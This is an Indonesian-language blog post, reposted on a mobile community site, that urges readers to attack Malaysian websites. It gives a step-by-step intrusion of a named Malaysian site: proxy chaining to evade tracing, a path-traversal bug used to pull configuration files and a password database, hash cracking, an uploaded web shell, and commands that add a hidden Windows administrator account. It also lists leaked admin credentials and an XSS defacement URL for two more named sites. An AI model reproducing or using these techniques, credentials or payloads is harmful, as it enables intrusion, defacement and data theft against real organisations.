peperonity Mobile Community
Welcome, guest. You are not logged in.
Log in or join for free!
 
New to peperonity.com?
Your username allows you to login later. Please choose a name with 3-20 alphabetic characters or digits (no special characters). 
Please enter your own and correct e-mail address and be sure to spell it correctly. The e-mail adress will not be shown to any other user. 
This password protects your account. To avoid typos it must be entered twice. Please enter 5-20 alphabetic characters or digits (no special characters). Choose a password that is not easy to guess! Never disclose your password to anyone. 
This password protects your account. To avoid typos it must be entered twice. Please enter 5-20 alphabetic characters or digits (no special characters). Choose a password that is not easy to guess! Never disclose your password to anyone. 
Stay logged in
Enter your username and password to log in. Forgot login details?

Username 
CAUTION: Do not disclose your password to anybody! Only enter it at the official login of peperonity.com. We will never ask for your password in a message! 
Login
Stay logged in

Share photos, videos & audio files
Create your own WAP site for free
Get a blog
Invite your friends and meet people from all over the world
All this from your mobile phone!
For free!
Get started!

You can easily invite all your friends to peperonity.com. When you log in or register with us, you can tell your friends about exciting content on peperonity.com! The messaging costs are on us.
Meet our team member Sandy and learn how to create your own mobile site!

Attack Malaysia Site - ian29januari



Attack Malaysia Site

Posted on March 3, 2008 by hacktrack

Topik ini saya buat karena saya yakin bahwa banyak orang Indonesia yang geram dengan kelakuan Malaysia. Di sini saya tidak memprovokasi Anda untuk melawan Malaysia secara terbuka, tapi atas inisiatif saya sendiri untuk melakukan serangan ke website-website Malaysia. Sebelumnya saya akan memberikan sebuah gambaran serangan website www.rasasayang.com.my yang saat ini telah online kembali dengan update Apache terbaru dan PHP 5.2.5-nya.

Situs www.rasasayang.com.my secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini.

1. Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5. Mengambil-alih server

Saya akan menjelaskan langkah-langkah di atas satu per satu.

1. Persiapan hacking
Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh “Pengejar Hacker” maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China.

Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5:

bouncer –bind 192.168.0.5 –port 8881 –tunnel 82.0.0.1:8080 –destination 221.0.0.1:8080
bouncer –bind 192.168.0.5 –port 8882 –tunnel 192.168.0.5:8881 –destination 200.0.0.1:3128

Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my

Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.

2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL:http://www.rasasayang.com.my/index.cfm??dir=download&menu=home...

Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya.

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..down...

Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.

—>

Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.

3. Mendownload source code dan file konfigurasi

Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya:

http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..appl...
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..inde...

Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini.

Selanjutnya kita download file konfigurasi web servernya dengan cara berikut:

File konfigurasi IIS:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:&C...

File konfigurasi CFM:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:&C...

File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:&C... and SettingsAdministratorLocal SettingsHistoryHistory.IE5index.dat

Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:webuserwebpowerofpaytv.com
- www.jedrealty.com yang terletak di E:webuserwebjedrealty.com
- www.rasasayang.com.my yang terletak di E:webuserwebrasasayang.com.my

Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/

Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:webuserwebpowerofpaytv.com_dbdcm_casbaa_db.mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:&C...

Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.
4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file.

Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:

#Replace(Replace(Replace(’#cmdResult#’, ‘<’, ‘<’, ‘all’), ‘>’, ‘>’, ‘all’), Chr(10), ‘
’, ‘all’)#

5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface.

NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD

Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut:

bouncer –bind 192.168.0.5 –port 8883 –tunnel 82.0.0.1:8080 –destination 221.0.0.1:8080
bouncer –bind 192.168.0.5 –port 8884 –tunnel 192.168.0.5:8883 –destination 202.157.176.17:3389

sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884

Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.

Sumber: www.jasakom.com ditulis oleh: Satria Kelana

Ok selanjutnya ada sebuah web site yang saya dapatkan dari sebuah forum:

http://www.i-putra.com.my

Ketika memperhatikan web ini, saya kira sudah di patch oleh adminnya, tapi kemudian saya mencoba memasuki panel admin di:

http://www.i-putra.com.my/sites/admin/login.cfm

Saya masukkan id dan password yang saya dapatkan dari forum, id: sox dan password: 123

Dan sekarang apa yang terjadi?? Silahkan di liat sendiri.

Sumber: echo forum

Ada satu lagi site, dan untuk yang satu ini ,saya tidak mengambil dari forum manapun, karena ditemukan sendiri dan hanya berupa kelemahan XSS. Website ini memiliki kelemahan itu, dan dengan keterbatasan ilmu yang saya miliki, saya hanya bisa melakukan Hack dengan XSS.

Silahkan lihat website ini:

http://raihan.com.my/homepage/index.php?option=com_content&tas...

Setelah itu saya memasukkan XSS seperti ini:

http://raihan.com.my/homepage/index.php?option=com_content&tas...
Hack_by_n0th1ng.r34l

Anda sudah melihatnya?

Sampai di sini saya menunjukkan beberapa website yang sudah di Hack oleh Hacker Indonesia. Semoga ke depannya saya dapat memberikan website yang berhasil saya deface (semoga tidak terjadi), untuk itupun saya harus banyak berlatih lagi dan belajar. Akhir kata selamat menyerang website Malaysia. dan tidak lupa saya katakan, jangan mudah terprovokasi! Karena saya juga tidak suka menjadi Provokator!!!!

sumber :http://n0th1ngr34l.wordpress.com/


This page:





Help/FAQ | Terms | Imprint
Home People Pictures Videos Sites Blogs Chat
Top